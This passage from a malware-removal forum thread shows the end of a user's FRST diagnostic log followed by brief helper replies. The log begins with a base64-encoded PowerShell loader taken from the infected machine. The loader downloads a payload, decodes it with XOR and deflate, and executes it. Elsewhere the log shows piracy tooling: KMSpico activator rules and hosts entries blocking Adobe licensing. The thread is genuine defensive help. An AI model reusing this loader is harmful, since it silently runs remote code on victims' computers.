FQARABwADQARABzADIAaQBnAE8AdwAtAG4AQwBJADAAUwBzADgAUwBwAGsAXwBDAFIALQBKAHkAWgBGAHgARgBBAG4ANQB2ADMAYgBHAFYAeQBTAFgAbQA3AFcAQgBJAGYAMQAyADAAQgBOAFcAcwB0AHQARgBDAE4ATQAtAGYATABCAFgANgByAGsAegBRAG0AbABTAHYAWQBjAGMAOQBQAHUAeQB5AGcAaAB5ADkAYQBkAHYAcQB6AEQAbgBzADEAMwA5AG8ATwB4AEwAVgAzAFgAMwA0ADUAOAAxAEoAQQA1AEMANwAtAGMAaQBkAGEAVgBoAE4AOAB0AEYAcgBUAG4AMgBzAFQAXwBBADYAeQBZADEATgA0AGUASQBLAHYAdQB1AEYAawB0ADMAUQBQADEANwBhAFYAQgBXADgAdwByAGoAegA4ADUAcwAyAHQAcABoADUAUwA0AHAANgBDAGsAZQBFAEEAVQBSAGIARQBoAHgATABaAHEAZQBpAFkASgB6AHgAbwA3AEUAZwBvAFMAaQBGAEcAeABzAFgANAA4AGgAUAAzAHIAdQBJAEUAYwBpAGoAZgB0AG0AYgBBAGgAaQBSAGgAVgA4AEwANgBjADYAUgBEAFEAegA4ADAAbgBDADcAVgBrAE4AbgAxAEEARQBVAHYARgA4AHcASgB4ADMAbAA1AEEAWABhADUAbwA3AEEAMgBXAHkAMgB3AEgAdwBlAFoAWABJAHkASgBWAHMASgA3AHcAOABvAFMATQA1AGIAVwAtAEQAegBxAHMANgBGADYATABrAGMAZgBRAG8ARwA3AGgAZABPAEIAbQA3AGwAdQBxAE0AWAAyADkATwByAFUAUABUAGkAcABiAEEAbwBxAEoAWABkAHkANwBNAHkAYgBfAFIAVABNADIARABjAFoANgBlAFgANwBwAGYAZwBMAHYAMwBmAHQAVABfAEcAeQB6AGYAVAA5AHAASABFADUANAB6AGMANgBPAGgARABtAHUAMQBhAHYAQgBFAEsAcwB0ADIAcwBGAHcAdQBKAFEAMAAxADAAMQBsAGwARAAtAFgAawBvAGkAawBMAF8AdABtAFcAdwB5ADcANQByADQANwAwAGkAVQBYAEcAeAB0AEEAcwByAHMARwBYADgAVABjAEcARgBZAHoANgBuAGwAUABzAFcASgBCAGEAWgBBAG4AWgB3AGoANQB2ADMAUwBoAGEAJgByAD0AMwA1ADEANwAwADAANAA5ADMAMQA1ADEANwA0ADQANAA4ADUAIgA7ACQAcwB0AHMAawA9ACIAewBGAEEANQA3ADcAMQBCAEYALQBGADcANAA2AC0AQwAyADMAOAAtADYANgA1ADMALQAzADkARQA1ADMAQgBGADUAQQBEADkANwB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {B25F6F74-882E-44F3-A3DA-2FAAE4D0989B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.)
Task: {B92B5DAA-D739-4F53-BB4B-C6A20DDF0DFF} - System32\Tasks\AdobeAAMUpdater-1.0-Win8PC-Neki => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-04-28] (Adobe Systems Incorporated)
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {DBE3644E-7F05-4F00-AF58-99FC700CF56A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.)
Task: {E2D593D0-5184-48FE-963C-CF929CC7C157} - \AutoPico Daily Restart -> No File <==== ATTENTION
Task: {FD516D4F-99E4-4476-8B9E-A27371DD8C0A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-06-02] (Piriform Ltd)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk -> C:\Users\Neki\AppData\Roaming\.minecraft\minecraft launcher\Debug.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-01-09 20:17 - 2010-01-09 20:17 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 08794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 00218624 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
2010-11-16 21:38 - 2010-11-16 21:38 - 00339456 _____ () C:\ProgramData\DatacardService\HWDeviceService64.exe
2015-02-01 22:07 - 2013-07-23 11:47 - 00239696 _____ () C:\ProgramData\MobileBrServ\mbbservice.exe
2015-06-17 21:11 - 2015-06-17 21:10 - 08016666 _____ () C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe
2015-01-19 16:54 - 2015-01-19 16:53 - 00011362 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\mingwm10.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 00043008 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\libgcc_s_dw2-1.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 02415104 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtCore4.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 01148416 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtNetwork4.dll
2010-01-09 20:18 - 2010-01-09 20:18 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:34 - 2010-01-21 01:34 - 08793952 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-01-30 17:11 - 2016-01-28 01:39 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libglesv2.dll
2016-01-30 17:11 - 2016-01-28 01:39 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libegl.dll
2008-06-03 17:06 - 2008-06-03 17:06 - 00269080 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\ERSREGPR.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00228120 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\MSENCDAT.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00178968 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\ENCCONT.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00351000 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\MSENCXML.DLL
2008-06-03 17:05 - 2008-06-03 17:05 - 00068376 _____ () C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICTEIT.EBK
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 21:25 - 2015-10-18 01:17 - 00001132 ____A C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1                   activate.adobe.com
127.0.0.1                   practivate.adobe.com
127.0.0.1                   lmlicenses.wip4.adobe.com
127.0.0.1                   lm.licenses.adobe.com
127.0.0.1                   na1r.services.adobe.com
127.0.0.1                   hlrcv.stage.adobe.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Neki\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AtwtusbIcon"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\StartupFolder: => "Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "DAEMON Tools Ultra Agent"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000000"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000001"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{0DBE97CB-0CAD-4128-83EC-DEF98BC1B130}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{FCD6D704-BDFC-4A21-A521-1EA25209E098}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{FE26A68E-E99A-42EB-8AA8-180E99FD5B22}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{CAE18944-8533-46A7-BE1F-2790013F2FEB}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{68565AE1-E2E7-46B5-B002-D6A7117FF945}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{D7DB9A5E-F7C1-4F2E-92B3-B5B06C33FD1E}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{D2945828-0816-4170-892D-4031D58A12BB}] => (Allow) C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B8EF5B78-E1B6-4EBD-A503-A91EBD40E031}] => (Allow) C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B205996D-DD71-4BE0-9881-0E43E82B2976}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2C5681D7-B388-4CDA-AF0C-A64759D84B85}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{6D52B509-E0E8-4A45-84ED-D3B466DE40C1}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{FB78DA53-AD21-467A-B183-C72FF026594B}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{00CB10E3-4EF7-4192-8BFF-B98CD6E34009}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{46761719-CFA6-4D4F-B6EB-64A793CC1C84}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [TCP Query User{1822D9A0-67BF-4EF9-AB9E-59ECF4CE1697}C:\xampp\filezillaftp\filezillaserver.exe] => (Block) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [UDP Query User{0AEAAB7C-F053-44E1-9764-40868C346CD7}C:\xampp\filezillaftp\filezillaserver.exe] => (Block) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [{AF0256BB-5DCE-4FB7-8DF4-40BD728EBF00}] => (Allow) C:\Program Files (x86)\FreeFileViewer\FFVCheckForUpdates.exe
FirewallRules: [{A4559FD4-F9E4-4726-B71D-CC0BA5346F07}] => (Allow) C:\Program Files (x86)\File Type Assistant\TSAssist.exe
FirewallRules: [TCP Query User{FFD63742-1A99-4023-A8EC-3100F80166B7}C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{51AF617B-8045-4856-ACE3-A8A32E74B860}C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [TCP Query User{05D5AB32-50D0-42AC-BC33-52460CB89079}C:\users\neki\desktop\left 4 dead 2\left4dead2.exe] => (Block) C:\users\neki\desktop\left 4 dead 2\left4dead2.exe
FirewallRules: [UDP Query User{A03726B9-AB54-41FF-9252-F7A917EC836D}C:\users\neki\desktop\left 4 dead 2\left4dead2.exe] => (Block) C:\users\neki\desktop\left 4 dead 2\left4dead2.exe
FirewallRules: [TCP Query User{CC318DE9-780B-4275-A749-0113746177EB}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{081E81E9-31C7-49B1-B450-D64E2597ED83}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{CA64ADEF-848C-4AA9-B0FA-0863E5B19652}C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe] => (Allow) C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe
FirewallRules: [UDP Query User{4C25E113-D2F3-443F-8146-78475D19F32D}C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe] => (Allow) C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe
FirewallRules: [{F31D87E7-A355-4D09-9587-B7849E5BDF37}] => (Allow) C:\Program Files (x86)\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{1749066D-8CFF-472D-8D0E-41EFCCECB291}] => (Allow) C:\Program Files (x86)\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{B5BC5BD9-8C5E-44E0-8748-4731BC784180}] => (Allow) C:\Program Files (x86)\LuckyBrowse\app\LuckyBrowse.exe
FirewallRules: [{B72F015E-8B9F-4D57-9601-85E3BA845916}] => (Allow) C:\Program Files (x86)\LuckyBrowse\app\LuckyBrowse.exe
FirewallRules: [TCP Query User{BBDBD78B-8264-43EF-80DC-966A67525B85}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{20EF9C06-CD3D-4EAE-AA1C-F2917ACC6A27}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{688F899E-F9C7-4BC2-AA9A-97D76A7DE20A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
15-01-2016 21:28:06 Scheduled Checkpoint
29-01-2016 00:37:24 Scheduled Checkpoint
02-02-2016 23:53:10 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/03/2016 12:17:17 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:17:09 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:16:40 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:16:35 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:06:07 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:05:42 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:59:11 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:58:57 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:38:03 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:37:59 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
 
 
System errors:
=============
Error: (02/02/2016 11:37:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error: 
%%1053
 
Error: (02/02/2016 11:37:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Nonchalant Necessary service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Mobile Broadband HL Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Print Spooler service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
 
Error: (02/02/2016 11:35:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Wacom Professional Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 05:27:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error: 
%%1053
 
Error: (02/02/2016 05:27:28 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3 CPU M 380 @ 2.53GHz
Percentage of memory in use: 74%
Total physical RAM: 1782.86 MB
Available physical RAM: 453.86 MB
Total Virtual: 3958.86 MB
Available Virtual: 2391.54 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:224.61 GB) (Free:79.32 GB) NTFS
Drive d: () (Fixed) (Total:240.81 GB) (Free:132.1 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 5B227C29)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=224.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=240.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#4 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 02 February 2016 - 12:37 PM

Thanks for the logs Neki. I'm afraid I have to go out for a while but will reply in a few hours when I get back and have checked your logs.

 

Satchfan


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#5 Neki

Neki
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 02 February 2016 - 12:56 PM

No problem! This isn't really urgent anyway. Have a great time! :)



#6 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 02 February 2016 - 05:59 PM

